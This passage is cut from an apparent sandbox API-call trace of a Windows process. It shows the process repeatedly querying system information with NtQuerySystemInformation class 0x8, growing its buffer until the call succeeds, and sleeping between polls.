Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.786] Sleep (dwMilliseconds=0x110) [0194.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.801] Sleep (dwMilliseconds=0x110) [0194.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.819] Sleep (dwMilliseconds=0x110) [0194.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.835] Sleep (dwMilliseconds=0x110) [0194.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.846] Sleep (dwMilliseconds=0x110) [0194.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.867] Sleep (dwMilliseconds=0x110) [0194.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.882] Sleep (dwMilliseconds=0x110) [0194.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.894] Sleep (dwMilliseconds=0x110) [0194.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.914] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.915] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.915] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.916] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.916] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.917] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.917] Sleep (dwMilliseconds=0x110) [0194.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.930] Sleep (dwMilliseconds=0x110) [0194.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.960] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.961] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.968] Sleep (dwMilliseconds=0x110) [0194.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.989] Sleep (dwMilliseconds=0x110) [0194.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.006] Sleep (dwMilliseconds=0x110) [0195.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.022] Sleep (dwMilliseconds=0x110) [0195.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.031] HeapFree (in: hHeap=0x2560000, 